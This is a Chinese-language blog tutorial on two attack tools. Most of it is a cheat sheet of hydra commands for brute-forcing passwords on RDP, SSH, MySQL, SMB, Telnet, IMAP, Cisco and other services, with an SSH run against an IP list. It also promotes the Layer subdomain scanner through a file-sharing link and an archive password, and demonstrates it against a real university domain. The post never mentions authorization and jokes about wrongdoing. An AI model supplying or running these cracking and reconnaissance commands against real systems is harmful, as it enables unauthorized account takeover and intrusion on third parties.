爆破工具

          经过几天的学习，我学到了一些利用工具进行爆破的工具，所以今天很高兴的和大家分享一下。我介绍的爆破工具有两种：hydra和Layer子域名挖掘机4.2纪念版，下面我将介绍怎么使用这两种工具及工具的使用语法。

**1.hydra**

        Hydra是著名黑客组织thc开发的一款开源的暴力密码破解工具，可以在线破解多种密码，目前已经被Backtrack和kali等渗透平台收录，hydra 是一个暴力破解工具，主要是针对Linux的。

爆破常用语法小结：
-R 继续从上一次进度接着破解
-S 采用SSL链接
-s PORT 如果非默认端口，可通过这个参数指定
-l LOGIN 小写，用于指定破解的用户，对特定用户破解
-L FILE 大写，用于指定用户的用户名字典
-p PASS 小写，用于指定密码破解，少用，一般是采用密码字典
-P FILE 大写，用于指定密码字典
-e ns 额外的选项，n：空密码试探，s：使用指定账户和密码试探
-C FILE 使用冒号分割格式 例如 “登录名:密码”来代替-L/-P参数
破解rdp(3389)： hydra -l administrator -P password.txt -V IP rdp
破解mysql： hydra ip -L 用户名 -P pass.txt -V mysql
破解ssh： hydra -L user.txt -P password.txt -e ns -vV IP ssh
破解https： hydra -m /index.php -l muts -P pass.txt IP https
破解teamspeak： hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
破解cisco： hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt IP cisco-enable
破解smb： hydra -l administrator -P pass.txt IP smb
破解pop3： hydra -l muts -P pass.txt my.pop3.mail pop3
破解http-proxy： hydra -l admin -P pass.txt http-proxy://IP
破解imap： hydra -L user.txt -p secret IP imap PLAIN
hydra -C defaults.txt -6 imap
破解telnet： hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

hydra的安装
（1）在虚拟机中安装Kali系统，自带hydra工具。
（2）在centos系统中安装hydra工具：
直接使用命令yum install -y hydra

实战：
手动创建用户名字典和密码字典，这里只是为了演示，只加了几个用户名和弱口令。
hydra -l login.txt -P password.txt -M iplist.txt -f -v ssh

绿色的为爆破成功

** 2.Layer子域名挖掘机4.2纪念版 **

更新内容如下：
1、降级.NET版本至4.0，因之前有人反馈WIN2003无法使用，因为2003不能安装.NET4.5，现在win2003及XP都可以正常使用。
2、增加获取web服务器信息的功能，如果在渗透过程中，担心软件自动访问web服务器会记录到web日志，可以关闭获取WEB服务器信息功能，但是如果干特别大的坏事，人家还是可以通过运营商的渠道来抓你。
3、增加线程控制，因有不少人反馈，开全速的时候，他们的小电脑会卡死，反正我电脑跑起来妥妥的，所以默认设置为全速。
4、增加右键复制所选项，胖子硬提出的需求。
5、修复了一个线程锁的问题，没修复前会引起程序崩溃。
小TIPS：为了适应不同的分辨率，首次启动设置了全屏，可点击右上角的最大化按钮复位到我截图的这个小窗口。

百度网盘下载:
链接：http://pan.baidu.com/s/1mh70iIO
提取密码：nj0x
解压密码：www.exehack.net

实战：
解压文件

运行Layer.exe文件

在域名的地方输入nyist.edu.cn，将端口前面的“√”去掉，点启动

任意点开一个ip,进入，以第一个为例